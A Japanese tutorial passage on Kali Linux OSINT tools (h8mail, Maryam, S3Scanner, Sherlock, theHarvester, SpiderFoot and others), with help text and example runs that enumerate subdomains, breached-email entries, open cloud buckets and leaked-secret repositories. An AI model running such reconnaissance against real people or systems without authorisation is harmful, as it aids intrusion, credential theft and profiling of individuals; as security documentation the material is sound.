hunter.io private API key if used without power-chase
--power-chase Add related emails from ALL API services to ongoing target list. Use with --chase
--hide Only shows the first 4 characters of found passwords to output. Ideal for demonstrations
--debug Print request debug information
--gen-config, -g Generates a configuration file template in the current working directory & exits. Will overwrite existing
h8mail_config.ini file
■ 使用例
# Leak-Lookupを使用して検索
root@kali:~# h8mail -t ****@****.com -k "leak-lookup_pub=<APIキー>"
[>] Targets:
[>] ****@****.com
[>] Found leak-lookup_pub configuration key
[~] scylla.so is down, skipping
[~] Target factory started for ****@****.com
[~] [****@****.com]>[hunter.io public]
[>] Found 0 related emails for ****@****.com using hunter.io (public)
[~] [****@****.com]>[leaklookup public]
[>] Found 16 entries for ****@****.com using LeakLookup (public)
__________________________________________________________________________________________
[>] Showing results for ****@****.com
LEAKLOOKUP_PUB | ****@****.com > canva.com
LEAKLOOKUP_PUB | ****@****.com > collection-1
LEAKLOOKUP_PUB | ****@****.com > collection-4-eu
LEAKLOOKUP_PUB | ****@****.com > collection-4-u
LEAKLOOKUP_PUB | ****@****.com > bit.ly
LEAKLOOKUP_PUB | ****@****.com > dropbox.com
LEAKLOOKUP_PUB | ****@****.com > peatix.com
LEAKLOOKUP_PUB | ****@****.com > trello.com
LEAKLOOKUP_PUB | ****@****.com > tumblr.com
LEAKLOOKUP_PUB | ****@****.com > twitter.com
__________________________________________________________________________________________
Session Recap:
Target | Status
__________________________________________________________________________________________
****@****.com | Breach Found (10 elements)
__________________________________________________________________________________________
Maltego
インターネット上の様々なオープンデータ(DNS、IPアドレス、検索エンジン、SNS、ShodanやCensysなど100以上の外部サービスとの連携)を検出し可視化します。
■ 使用例
対象のドメインをもとにWebサイトやIPアドレス、開いているポートなどを可視化
無償で利用可能なコミュニティエディションはMaltego Graphの標準トランスフォーマーのみのサポートとなります。外部サービスとの連携には別途ライセンスの購入が必要です。
OWASP Maryam
インターネット上の様々なオープンデータを収集します。
■ 使用方法
root@kali:~# maryam
[maryam][default] > help
Commands (type [help|?] <topic>):
---------------------------------
exit Exits the framework
help Displays this menu
reload Reloads all modules
report Get report from the Gathers and save it to the other formats
search Searches available modules
set Sets module options
shell Executes shell commands
show Shows various framework items
unset Unsets module options
update Update modules via module name
web Manage web/api interface
workspaces Manages workspaces
[maryam][default] > show modules
Osint
-----
social_nets
tweet_search
email_pwned
crawler
cve_search
suggest
image_search
username_search
onion_search
email_search
dark_web_crawler
phone_number_search
famous_person
docs_search
cloud_storage
domain_reputation
dns_search
github_leaks
article_search
Footprint
---------
tldbrute
entry_points
crawl_pages
filebrute
dnsbrute
Search
------
crt
reddit
pubmed
telegram
pastebin
stackoverflow
tiktok
instagram
scholar
bing
sanctionsearch
quora
yahoo
sepiasearch
etools
wikileaks
spotify
twitter
github
dictionary
wikipedia
arxiv
google
trello
duckduckgo
discord
linkedin
photon
facebook
youtube
piratebay
startpage
Iris
----
topicmodeling
sentiment
cluster
iris_cluster
iris
■ 使用例
root@kali:~# maryam
[maryam][default] > dns_search -d qiita.com
[*] [OTX] Searching in otx.alienvault...
[*] [SECTRAILS] Enumerating dns records...
[*] HOSTNAMES
[*] terminated.qiita.com
[*] ads.qiita.com
[*] corp.qiita.com
[*] slack.teams.qiita.com
[*] net-marketing.qiita.com
[*] staging.qiita.com
[*] plus.jobs.qiita.com
[*] teams.qiita.com
[*] jobs.qiita.com
[maryam][default] > github --query aws_secret_key --engine google --api --format
{
"repositories": [
"https://github.com/six2dez/burp-bounty-profiles",
"https://github.com/aws/aws-sdk-java",
"https://github.com/shellphish/ictf-framework",
"https://github.com/aws/aws-sdk-go",
"https://github.com/terraform-providers/terraform-provider-terraform",
"https://github.com/getredash/redash",
[...]
],
"blogs": [
"gist.github.com"
],
"usernames": [
"Casecommons",
"terraform-providers",
"awslabs",
[...]
],
"emails": []
}
# コマンドを直接実行することも可能
root@kali:~# maryam -e github --query aws_secret_key --engine google --api --format
Metagoofil
ウェブサイト上で公開されている特定の種類のファイルをGoogleで検索してダウンロードします。
■ 使用方法
root@kali:~# metagoofil --help
usage: metagoofil.py [-h] -d DOMAIN [-e DELAY] [-f [SAVE_FILE]] [-i URL_TIMEOUT] [-l SEARCH_MAX] [-n DOWNLOAD_FILE_LIMIT] [-o SAVE_DIRECTORY]
[-r NUMBER_OF_THREADS] -t FILE_TYPES [-u [USER_AGENT]] [-w]
options:
-h, --help show this help message and exit
-d DOMAIN Domain to search.
-e DELAY Delay (in seconds) between searches. If it\'s too small Google may block your IP, too big and your search may take a
while. Default: 30.0
-f [SAVE_FILE] Save the html links to a file.
no -f = Do not save links
-f = Save links to html_links_<TIMESTAMP>.txt
-f SAVE_FILE = Save links to SAVE_FILE
-i URL_TIMEOUT Number of seconds to wait before timeout for unreachable/stale pages. Default: 15
-l SEARCH_MAX Maximum results to search. Default: 100
-n DOWNLOAD_FILE_LIMIT
Maximum number of files to download per filetype. Default: 100
-o SAVE_DIRECTORY Directory to save downloaded files. Default is current working directory, "."
-r NUMBER_OF_THREADS Number of downloader threads. Default: 8
-t FILE_TYPES file_types to download (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx). To search all 17,576 three-letter file extensions,
type "ALL"
-u [USER_AGENT] User-Agent for file retrieval against -d domain.
no -u = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
-u = Randomize User-Agent
-u "My custom user agent 2.0" = Your customized User-Agent
-w Download the files, instead of just viewing search results.
■ 使用例
root@kali:~# metagoofil -d www.ipa.go.jp -n 10 -t pdf -o pdf -w
[*] Downloaded files will be saved here: pdf
[*] Searching for 100 .pdf files and waiting 30.0 seconds between searches
[+] Downloading "000063749.pdf" [444492 bytes] from: https://www.ipa.go.jp/archive/files/000063749.pdf
[+] Downloading "000066605.pdf" [1209946 bytes] from: https://www.ipa.go.jp/archive/files/000066605.pdf
[...]
ReconSpider
インターネット上に公開されているさまざまなソースから情報を見つけるためのOSINTフレームワークです。
■ 使用方法
root@kali:~# reconspider
ENTER 0 - 13 TO SELECT OPTIONS
1. IP Enumerate information from IP Address
2. DOMAIN Gather information about given DOMAIN
3. PHONENUMBER Gather information about Phonenumber
4. DNS MAP Map DNS records associated with target
5. METADATA Extract all metadata of the given file
6. REVERSE IMAGE SEARCH Obtain domain name or IP address mapping
7. HONEYPOT Check if it\'s honeypot or a real system
8. MAC ADDRESS LOOKUP Obtain information about give Macaddress
9. IPHEATMAP Draw out heatmap of locations of IP
10. TORRENT Gather torrent download history of IP
11. USERNAME Extract Account info. from social media
12. IP2PROXY Check whether IP uses any VPN / PROXY
13. MAIL BREACH Checks given domain has breached Mail
0. EXIT Exit from ReconSpider to your terminal
■ 使用例
root@kali:~# reconspider
Reconspider >> 1
IP >> 8.8.8.8
[+] Gathering IP Address Information from [shodan]
IP Address ----> 8.8.8.8
Country -------> United States
City ----------> Mountain View
Organization --> Google LLC
ISP -----------> Google LLC
Open ports ----> [443, 53]
Reconspider >> 2
HOST (URL / IP) >> example.com
PORT >> 80
Target Alive
1. ReverseIP
2. SubDomain
3. nsLookup
4. CMSDetect
5. PortScan
6. Bruteforce
7. ClickJacking
8. CORS
9. Host Header Injection
10. Header
11. Crawler
12. Whoami
99. Exit
Domain >> 12
Domain Name:EXAMPLE.COM
Register:RESERVED-Internet Assigned Numbers Authority
Whois Server:whois.iana.org
Server:['A.IANA-SERVERS.NET', 'B.IANA-SERVERS.NET']
Emails:None
Organisation:None
Address:None
City:None
State:None
'zipcode'
Country:None
S3Scanner
指定したバケット名をもとにAWS、GCP、DigitalOcean、Linodeなどのクラウドプロバイダーのオブジェクトストレージからバケットの有無や権限設定をチェックします。
■ 使用方法
root@kali:~# s3scanner --help
INPUT: (1 required)
-bucket string Name of bucket to check.
-bucket-file string File of bucket names to check.
-mq Connect to RabbitMQ to get buckets. Requires config file key "mq". Default: "false"
OUTPUT:
-db Save results to a Postgres database. Requires config file key "db.uri". Default: "false"
-json Print logs to stdout in JSON format instead of human-readable. Default: "false"
OPTIONS:
-enumerate Enumerate bucket objects (can be time-consuming). Default: "false"
-provider string Object storage provider: aws, custom, digitalocean, dreamhost, gcp, linode - custom requires config file. Default: "aws"
-threads int Number of threads to scan with. Default: "4"
DEBUG:
-verbose Enable verbose logging. Default: "false"
-version Print version Default: "false"
■ 使用例
# hello,worldの2つの単語から単語リストを作成
root@kali:~# echo -e "hello\nworld" | rsmangler -t -T -c -u -l -s -e -i -C --punctuation --file - --output buckets.txt
# 単語リストをもとにAWS S3のスキャンを実行
root@kali:~# s3scanner -bucket-file buckets.txt -provider aws -enumerate
INFO invalid | hw
INFO exists | world | us-west-2 | AuthUsers: [] | AllUsers: []
INFO exists | hello | ap-south-1 | AuthUsers: [] | AllUsers: []
INFO exists | helloworld | us-east-1 | AuthUsers: [] | AllUsers: []
INFO exists | worldhello | eu-west-1 | AuthUsers: [] | AllUsers: []
INFO not_exist | olleh
INFO not_exist | 1990hello
INFO not_exist | hello1990
INFO not_exist | 1991hello
INFO not_exist | hello1991
INFO exists | hellohello | us-east-2 | AuthUsers: [] | AllUsers: []
INFO not_exist | hello1992
INFO not_exist | 1992hello
INFO not_exist | 1993hello
INFO not_exist | hello1993
[...]
INFO exists | hello2018 | ap-south-1 | AuthUsers: [] | AllUsers: [READ, READ_ACP] | 2 objects (486 kB)
INFO exists | hello2019 | us-east-1 | AuthUsers: [] | AllUsers: []
INFO exists | hello2020 | us-east-1 | AuthUsers: [] | AllUsers: []
[...]
INFO not_exist | 122hw
INFO not_exist | 123hw
INFO not_exist | hw122
INFO exists | hw121 | us-east-1 | AuthUsers: [] | AllUsers: []
INFO exists | hw123 | ap-northeast-2 | AuthUsers: [] | AllUsers: []
Sherlock
指定されたユーザー名に該当するSNSアカウントを400以上のソーシャルメディアから検索します。
■ 使用方法
root@kali:~# sherlock --help
usage: sherlock [-h] [--version] [--verbose] [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor] [--unique-tor] [--csv] [--xlsx]
[--site SITE_NAME] [--proxy PROXY_URL] [--dump-response] [--json JSON_FILE] [--timeout TIMEOUT] [--print-all] [--print-found]
[--no-color] [--browse] [--local] [--nsfw]
USERNAMES [USERNAMES ...]
positional arguments:
USERNAMES One or more usernames to check with social networks. Check similar usernames using {?} (replace to '_', '-', '.').
options:
-h, --help show this help message and exit
--version Display version information and dependencies.
--verbose, -v, -d, --debug
Display extra debugging information and metrics.
--folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT
If using multiple usernames, the output of the results will be saved to this folder.
--output OUTPUT, -o OUTPUT
If using single username, the output of the result will be saved to this file.
--tor, -t Make requests over Tor; increases runtime; requires Tor to be installed and in system path.
--unique-tor, -u Make requests over Tor with new Tor circuit after each request; increases runtime; requires Tor to be installed and in
system path.
--csv Create Comma-Separated Values (CSV) File.
--xlsx Create the standard file for the modern Microsoft Excel spreadsheet (xlsx).
--site SITE_NAME Limit analysis to just the listed sites. Add multiple options to specify more than one site.
--proxy PROXY_URL, -p PROXY_URL
Make requests over a proxy. e.g. socks5://127.0.0.1:1080
--dump-response Dump the HTTP response to stdout for targeted debugging.
--json JSON_FILE, -j JSON_FILE
Load data from a JSON file or an online, valid, JSON file.
--timeout TIMEOUT Time (in seconds) to wait for response to requests (Default: 60)
--print-all Output sites where the username was not found.
--print-found Output sites where the username was found (also if exported as file).
--no-color Don\'t color terminal output
--browse, -b Browse to all results on default browser.
--local, -l Force the use of the local data.json file.
--nsfw Include checking of NSFW sites from default list.
■ 使用例
root@kali:~# sherlock helloworld
[*] Checking username helloworld on:
[+] 1337x: https://www.1337x.to/user/helloworld/
[+] 7Cups: https://www.7cups.com/@helloworld
[+] 8tracks: https://8tracks.com/helloworld
[+] 9GAG: https://www.9gag.com/u/helloworld
[+] About.me: https://about.me/helloworld
[...]
[+] note: https://note.com/helloworld
[+] npm: https://www.npmjs.com/~helloworld
[+] opennet: https://www.opennet.ru/~helloworld
[+] osu!: https://osu.ppy.sh/users/helloworld
[+] phpRU: https://php.ru/forum/members/?username=helloworld
[+] pikabu: https://pikabu.ru/@helloworld
[+] pr0gramm: https://pr0gramm.com/user/helloworld
[+] social.tchncs.de: https://social.tchncs.de/@helloworld
[*] Search completed with 253 results
sn0int
半自動OSINTフレームワークです。サブドメインの収集やSNSのプロフィール情報の収集などを行います。
■ 使用方法
root@kali:~# sn0int --help
Usage: sn0int [OPTIONS] [COMMAND]
Commands:
run Run a module directly
sandbox For internal use
login Login to the registry for publishing
new Create a new module
publish Publish a script to the registry
install Install a module from the registry
search Search in the registry
pkg The sn0int package manager
add Insert into the database
select Select from the database
delete Delete from the database
activity Query logged activity
scope Include entities in the scope
noscope Exclude entities from scope
autoscope Manage autoscope rules
autonoscope Manage autonoscope rules
rescope Rescope all entities based on autonoscope rules
workspace Manage workspaces
cal Calendar
notify Notify
fsck Verify blob storage for corrupt and dangling blobs
export Export a workspace for external processing
stats Show statistics about your current workspace
repl Run a lua repl
paths Show paths of various file system locations
completions Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-w, --workspace <WORKSPACE> Select a different workspace instead of the default [env: SN0INT_WORKSPACE=]
-h, --help Print help
-V, --version Print version
■ 使用例
root@kali:~# sn0int
[+] Connecting to database
[+] Loaded 0 modules
[*] No modules found, run pkg quickstart to install default modules
[*] New to sn0int? Follow https://sn0int.rtfd.io/en/stable/usage.html
# デフォルトモジュールをインストール
[sn0int][default] > pkg quickstart
[+] imdyske/tinder : installed v0.1.0
[+] imdyske/fediverse : installed v0.1.0
[+] kpcyrd/apex-domain : installed v0.1.0
[+] kpcyrd/asn : installed v0.1.0
[+] kpcyrd/archive-org : installed v0.1.0
[+] kpcyrd/axfr : installed v0.3.0
[...]
# インストールしたモジュールの一覧を表示
[sn0int][default] > pkg list
imdyske/fediverse 0.1.0
Uses search.social to search for accounts on the fediverse
imdyske/tinder 0.1.0
Search tinder for profiles
kpcyrd/apex-domain 0.1.0
Create subdomain entries for apex domains
kpcyrd/archive-org 0.1.0
Collect information about an archive.org profile
kpcyrd/asn 0.1.0
Run a asn lookup for an ip address
kpcyrd/axfr 0.3.0
Try a zone transfer for subdomains
kpcyrd/btc-blockchain-info 0.1.0
Read tx history of bitcoin addresses
kpcyrd/cname-harvest 0.3.0
Query for CNAMES to find subdomains
kpcyrd/crypto-detect 0.2.0
Detect crypto currency from address
kpcyrd/ctlogs 0.7.0
Query certificate transparency logs to discover subdomains
[...]
# ドメインを追加
[sn0int][default] > add domain
[?] Domain: qiita.com
# 使用するモジュールを選択
[sn0int][default] > use ctlogs
# モジュールを実行(Certificate Transparencyのログからサブドメインを検索)
[sn0int][default][kpcyrd/ctlogs] > run
[*] "qiita.com" : Adding subdomain "support.qiita.com"
[*] "qiita.com" : Adding subdomain "business.qiita.com"
[*] "qiita.com" : Adding subdomain "www.business.qiita.com"
[*] "qiita.com" : Adding subdomain "teams.qiita.com"
[*] "qiita.com" : Adding subdomain "www.teams.qiita.com"
[*] "qiita.com" : Adding subdomain "jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "media.jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "www.media.jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "qiita.com"
[*] "qiita.com" : Adding subdomain "ads.qiita.com"
[*] "qiita.com" : Adding subdomain "www.ads.qiita.com"
[*] "qiita.com" : Adding subdomain "corp.qiita.com"
[*] "qiita.com" : Adding subdomain "plus.jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "terminated.qiita.com"
[*] "qiita.com" : Adding subdomain "kobito.qiita.com"
[*] "qiita.com" : Adding subdomain "slack.teams.qiita.com"
[*] "qiita.com" : Adding subdomain "staging.qiita.com"
[*] "qiita.com" : Adding subdomain "oauth.qiita.com"
[*] "qiita.com" : Adding subdomain "documents-jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "info.jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "pr.qiita.com"
[*] "qiita.com" : Adding subdomain "app.teams.qiita.com"
[*] "qiita.com" : Adding subdomain "blog.qiita.com"
[*] "qiita.com" : Adding subdomain "workq.qiita.com"
[*] "qiita.com" : Adding subdomain "staging.app.teams.qiita.com"
[*] "qiita.com" : Adding subdomain "career.qiita.com"
[+] Finished kpcyrd/ctlogs
SpiderFoot
様々なAPI、ツールを統合したOSINT自動化ツールです。
■ 使用方法
root@kali:~# spiderfoot --help
usage: sf.py [-h] [-d] [-l IP:port] [-m mod1,mod2,...] [-M] [-C scanID] [-s TARGET] [-t type1,type2,...]
[-u {all,footprint,investigate,passive}] [-T] [-o {tab,csv,json}] [-H] [-n] [-r] [-S LENGTH] [-D DELIMITER] [-f]
[-F type1,type2,...] [-x] [-q] [-V] [-max-threads MAX_THREADS]
options:
-h, --help show this help message and exit
-d, --debug Enable debug output.
-l IP:port IP and port to listen on.
-m mod1,mod2,... Modules to enable.
-M, --modules List available modules.
-C scanID, --correlate scanID
Run correlation rules against a scan ID.
-s TARGET Target for the scan.
-t type1,type2,... Event types to collect (modules selected automatically).
-u {all,footprint,investigate,passive}
Select modules automatically by use case
-T, --types List available event types.
-o {tab,csv,json} Output format. Tab is default.
-H Don\'t print field headers, just data.
-n Strip newlines from data.
-r Include the source data field in tab/csv output.
-S LENGTH Maximum data length to display. By default, all data is shown.
-D DELIMITER Delimiter to use for CSV output. Default is ,.
-f Filter out other event types that weren\'t requested with -t.
-F type1,type2,... Show only a set of event types, comma-separated.
-x STRICT MODE. Will only enable modules that can directly consume your target, and if -t was specified only those events
will be consumed by modules. This overrides -t and -m options.
-q Disable logging. This will also hide errors!
-V, --version Display the version of SpiderFoot and exit.
-max-threads MAX_THREADS
Max number of modules to run concurrently.
■ 使用例
# サイトが使用している技術スタックを探索
root@kali:~# spiderfoot -m sfp_tool_wappalyzer,sfp_tool_whatweb -s qiita.com
2024-11-16 11:27:27,357 [INFO] sf : Modules enabled (4): sfp_tool_wappalyzer,sfp_tool_whatweb,sfp__stor_db,sfp__stor_stdout
[...]
SpiderFoot UI Internet Name qiita.com
SpiderFoot UI Domain Name qiita.com
sfp_tool_whatweb Web Server CloudFront
sfp_tool_whatweb Web Technology CloudFront
sfp_tool_whatweb Raw Data from RIRs/APIs [{'target': 'http://qiita.com', 'http_status': 301, 'request_config': {'headers': {'User-Agent': 'Mozilla/5.0'}}, 'plugins': {'CloudFront': {}, 'Country': {'string': ['UNITED STATES'], 'module': ['US']}, 'HTTPServer': {'string': ['CloudFront']}, 'IP': {'string': ['18.65.207.93']}, 'RedirectLocation': {'string': ['https://qiita.com/']}, 'Title': {'string': ['301 Moved Permanently']}, 'UncommonHeaders': {'string': ['x-amz-cf-pop,x-amz-cf-id']}, 'Via-Proxy': {'string': ['1.1 7bdbfc0a92d08678fa98f050e3369202.cloudfront.net (CloudFront)']}}}]
sfp_tool_wappalyzer Software Used Ruby
sfp_tool_wappalyzer Software Used Ruby on Rails
sfp_tool_wappalyzer Software Used Amazon Web Services
sfp_tool_wappalyzer Software Used Emotion
sfp_tool_wappalyzer Software Used Emotion
sfp_tool_wappalyzer Web Technology Nginx
sfp_tool_wappalyzer Software Used Nginx
sfp_tool_wappalyzer Software Used Cloudflare
sfp_tool_wappalyzer Software Used Google Publisher Tag
sfp_tool_wappalyzer Software Used DoubleClick for Publishers (DFP)
sfp_tool_wappalyzer Software Used Google Tag Manager
sfp_tool_wappalyzer Software Used Imgix
sfp_tool_wappalyzer Software Used Imgix
sfp_tool_wappalyzer Software Used Google Font API
sfp_tool_wappalyzer Software Used Funding Choices
sfp_tool_wappalyzer Software Used Font Awesome
sfp_tool_wappalyzer Software Used cdnjs
sfp_tool_wappalyzer Software Used HSTS
sfp_tool_wappalyzer Software Used Amazon CloudFront
sfp_tool_wappalyzer Software Used AWS Certificate Manager
sfp_tool_wappalyzer Software Used PWA
sfp_tool_wappalyzer Software Used Open Graph
# Web GUIを起動
root@kali:~# spiderfoot -l 0.0.0.0:8080
スキャン結果は画面から確認可能(画面からのスキャン実行も可能)
subfinder
様々ななオンラインソースを使用して、ウェブサイトの有効なサブドメインを探索します。
■ 使用方法
root@kali:~# subfinder --help
Usage:
subfinder [flags]
Flags:
INPUT:
-d, -domain string[] domains to find subdomains for
-dL, -list string file containing list of domains for subdomain discovery
SOURCE:
-s, -sources string[] specific sources to use for discovery (-s crtsh,github). Use -ls to display all available sources.
-recursive use only sources that can handle subdomains recursively (e.g. subdomain.domain.tld vs domain.tld)
-all use all sources for enumeration (slow)
-es, -exclude-sources string[] sources to exclude from enumeration (-es alienvault,zoomeye)
FILTER:
-m, -match string[] subdomain or list of subdomain to match (file or comma separated)
-f, -filter string[] subdomain or list of subdomain to filter (file or comma separated)
RATE-LIMIT:
-rl, -rate-limit int maximum number of http requests to send per second
-t int number of concurrent goroutines for resolving (-active only) (default 10)
UPDATE:
-up, -update update subfinder to latest version
-duc, -disable-update-check disable automatic subfinder update check
OUTPUT:
-o, -output string file to write output to
-oJ, -json write output in JSONL(ines) format
-oD, -output-dir string directory to write output (-dL only)
-cs, -collect-sources include all sources in the output (-json only)
-oI, -ip include host IP in output (-active only)
CONFIGURATION:
-config string flag config file (default "/root/.config/subfinder/config.yaml")
-pc, -provider-config string provider config file (default "/root/.config/subfinder/provider-config.yaml")
-r string[] comma separated list of resolvers to use
-rL, -rlist string file containing list of resolvers to use
-nW, -active display active subdomains only
-proxy string http proxy to use with subfinder
-ei, -exclude-ip exclude IPs from the list of domains
DEBUG:
-silent show only subdomains in output
-version show version of subfinder
-v show verbose output
-nc, -no-color disable color in output
-ls, -list-sources list all available sources
-stats report source statistics
OPTIMIZATION:
-timeout int seconds to wait before timing out (default 30)
-max-time int minutes to wait for enumeration results (default 10)
■ 使用例
root@kali:~# subfinder -silent -d qiita.com | getallurls
https://business.qiita.com/robots.txt
https://ads.qiita.com/robots.txt
https://corp.qiita.com/
https://corp.qiita.com/jobs/engineers/
[...]
Sublist3r
Google、Yahoo、Bing、Baidu、Askなどの多くの検索エンジンやNetcraft、Virustotal、ThreatCrowd、DNSdumpster、ReverseDNSを使ってサブドメインを列挙します。
■ 使用方法
root@kali:~# sublist3r --help
usage: sublist3r [-h] -d DOMAIN [-b [BRUTEFORCE]] [-p PORTS] [-v [VERBOSE]] [-t THREADS] [-e ENGINES] [-o OUTPUT] [-n]
OPTIONS:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain name to enumerate it\'s subdomains
-b [BRUTEFORCE], --bruteforce [BRUTEFORCE]
Enable the subbrute bruteforce module
-p PORTS, --ports PORTS
Scan the found subdomains against specified tcp ports
-v [VERBOSE], --verbose [VERBOSE]
Enable Verbosity and display results in realtime
-t THREADS, --threads THREADS
Number of threads to use for subbrute bruteforce
-e ENGINES, --engines ENGINES
Specify a comma-separated list of search engines
-o OUTPUT, --output OUTPUT
Save the results to text file
-n, --no-color Output without color
■ 使用例
root@kali:~# sublist3r -d qiita.com
[-] Enumerating subdomains now for qiita.com
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
[...]
[-] Total Unique Subdomains Found: 25
ads.qiita.com
www.ads.qiita.com
blog.qiita.com
business.qiita.com
www.business.qiita.com
career.qiita.com
corp.qiita.com
documents-jobs.qiita.com
jobs.qiita.com
info.jobs.qiita.com
media.jobs.qiita.com
[...]
theHarvester
指定されたドメインの電子メール、IP、サブドメイン、URLを複数の公開リソースを使用して収集します。
■ 使用方法
root@kali:~# theHarvester --help
usage: theHarvester [-h] -d DOMAIN [-l LIMIT] [-S START] [-p] [-s] [--screenshot SCREENSHOT] [-v] [-e DNS_SERVER] [-t] [-r [DNS_RESOLVE]] [-n]
[-c] [-f FILENAME] [-b SOURCE]
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Company name or domain to search.
-l LIMIT, --limit LIMIT
Limit the number of search results, default=500.
-S START, --start START
Start with result number X, default=0.
-p, --proxies Use proxies for requests, enter proxies in proxies.yaml.
-s, --shodan Use Shodan to query discovered hosts.
--screenshot SCREENSHOT
Take screenshots of resolved domains specify output directory: --screenshot output_directory
-v, --virtual-host Verify host name via DNS resolution and search for virtual hosts.
-e DNS_SERVER, --dns-server DNS_SERVER
DNS server to use for lookup.
-t, --take-over Check for takeovers.
-r [DNS_RESOLVE], --dns-resolve [DNS_RESOLVE]
Perform DNS resolution on subdomains with a resolver list or passed in resolvers, default False.
-n, --dns-lookup Enable DNS server lookup, default False.
-c, --dns-brute Perform a DNS brute force on the domain.
-f FILENAME, --filename FILENAME
Save the results to an XML and JSON file.
-b SOURCE, --source SOURCE
anubis, baidu, bevigil, binaryedge, bing, bingapi, bufferoverun, brave, censys, certspotter, criminalip, crtsh,
dnsdumpster, duckduckgo, fullhunt, github-code, hackertarget, hunter, hunterhow, intelx, netlas, onyphe, otx,
pentesttools, projectdiscovery, rapiddns, rocketreach, securityTrails, sitedossier, subdomaincenter,
subdomainfinderc99, threatminer, tomba, urlscan, virustotal, yahoo, zoomeye
■ 使用例
root@kali:~# theHarvester -d example.com -b all -f results
[*] Target: example.com
[*] Searching Bing.
[*] Searching Anubis.
[*] Searching Baidu
[...]
zzq15.example.com
zzz7777.example.com
zzzmmmccc026.example.com
zzzzzzzzzzzz.example.com
[*] Reporting started.
[*] XML File saved.
[*] JSON File saved.
root@kali:~# jq '.asns[0:5],.emails[0:5],.hosts[0:5],.interesting_urls[0:5],.ips[0:5]' results.json
[
"AS132203",
"AS13335",
"AS15133",
"AS16262",
"AS16276"
]
[
"'bob@example.com",
"'john.doe@example.com",
"'me@example.com",
"'noah@example.com",
"'tom.lee@example.com"
]
[
".example.com",
"0.example.com",
"001.example.com",
"02.example.com",
"04.example.com"
]
[
"https://example.com/",
"https://example.com/phishing",
"https://www.example.com/"
]
[
"146.185.196.24",
"172.67.171.208",
"185.17.3.252",
"185.217.199.198",
"185.238.74.165"
]
Waybackpy
Wayback Machineへのページのアーカイブやアーカイブされたページの検索などを行います。
■ 使用方法
root@kali:~# waybackpy --help
Usage: waybackpy [OPTIONS]
Options:
-u, --url TEXT URL on which Wayback machine operations are
to be performed.
-ua, --user-agent, --user_agent TEXT
User agent, default value is 'waybackpy
3.0.6 -
https://github.com/akamhy/waybackpy'.
-v, --version waybackpy version.
-l, --show-license, --show_license, --license
Show license of Waybackpy.
-n, -au, --newest, --archive_url, --archive-url
Retrieve the newest archive of URL.
-o, --oldest Retrieve the oldest archive of URL.
-N, --near Archive close to a specified time.
-Y, --year INTEGER RANGE Year in integer. [1994<=x<=9999]
-M, --month INTEGER RANGE Month in integer. [1<=x<=12]
-D, --day INTEGER RANGE Day in integer. [1<=x<=31]
-H, --hour INTEGER RANGE Hour in integer. [0<=x<=24]
-MIN, --minute INTEGER RANGE Minute in integer. [0<=x<=60]
-s, --save Save the specified URL\'s webpage and print
the archive URL.
-h, --headers Headers data of the SavePageNow API.
-ku, --known-urls, --known_urls
List known URLs. Uses CDX API.
-sub, --subdomain Use with '--known_urls' to include known
URLs for subdomains.
-f, --file Use with '--known_urls' to save the URLs in
file at current directory.
--cdx Flag for using CDX API.
-st, --start-timestamp, --start_timestamp, --from TEXT
Start timestamp for CDX API in
yyyyMMddhhmmss format.
-et, --end-timestamp, --end_timestamp, --to TEXT
End timestamp for CDX API in yyyyMMddhhmmss
format.
-C, --closest TEXT Archive that are closest the timestamp
passed as arguments to this parameter.
-f, --cdx-filter, --cdx_filter, --filter TEXT
Filter on a specific field or all the CDX
fields.
-mt, --match-type, --match_type TEXT
The default behavior is to return matches
for an exact URL. However, the CDX server
can also return results matching a certain
prefix, a certain host, or all sub-hosts by
using the match_type
-st, --sort TEXT Choose one from default, closest or reverse.
It returns sorted CDX entries in the
response.
-up, --use-pagination, --use_pagination
Use the pagination API of the CDX server
instead of the default one.
-gz, --gzip TEXT To disable gzip compression pass false as
argument to this parameter. The default
behavior is gzip compression enabled.
-c, --collapse TEXT Filtering or 'collapse' results based on a
field, or a substring of a field.
-l, --limit TEXT Number of maximum record that CDX API is
asked to return per API call, default value
is 25000 records.
-cp, --cdx-print, --cdx_print TEXT
Print only certain fields of the CDX API
response, if this parameter is not used then
the plain text response of the CDX API will
be printed.
--help Show this message and exit.
■ 使用例
# Qiitaの最も古いアーカイブのスクリーンショットを取得
root@kali:~# waybackpy --url https://qiita.com --oldest | httpx -silent | httpx -silent -ss
https://web.archive.org/web/20110727192029/http://qiita.com/
取得したスクリーンショット
WitnessMe
指定されたURLのスクリーンショットの取得およびサーバーの情報の取得を行います。
■ 使用方法
root@kali:~# witnessme screenshot --help
usage: witnessme screenshot [-h] [-p PORTS [PORTS ...]] target [target ...]
positional arguments:
target The target IP(s), range(s), CIDR(s) or hostname(s), NMap XML file(s), .Nessus file(s)
options:
-h, --help show this help message and exit
-p PORTS [PORTS ...], --ports PORTS [PORTS ...]
Ports to scan if IP Range/CIDR is provided
root@kali:~# witnessme grab --help
usage: witnessme grab [-h] [-x XPATH | -l] target [target ...]
positional arguments:
target The target IP(s), range(s), CIDR(s) or hostname(s), NMap XML file(s), .Nessus file(s)
options:
-h, --help show this help message and exit
-x XPATH, --xpath XPATH
XPath to use
-l, --links Get all links
root@kali:~# wmdb --help
usage: wmdb [-h] scan_folder
positional arguments:
scan_folder WitnessMe scan folder
options:
-h, --help show this help message and exit
■ 使用例
root@kali:~# witnessme screenshot http://192.168.11.4
[witnessme.screenshot] INFO - Starting scan 02044794-b5ca-4d0e-8a0f-a6d8413d5798
[witnessme.headlessbrowser] INFO - Starting headless browser
[witnessme.headlessbrowser] WARNING - Running under root privileges, browser will start with --no-sandbox
[witnessme.headlessbrowser] INFO - Using 1 browser tab(s)/thread(s)
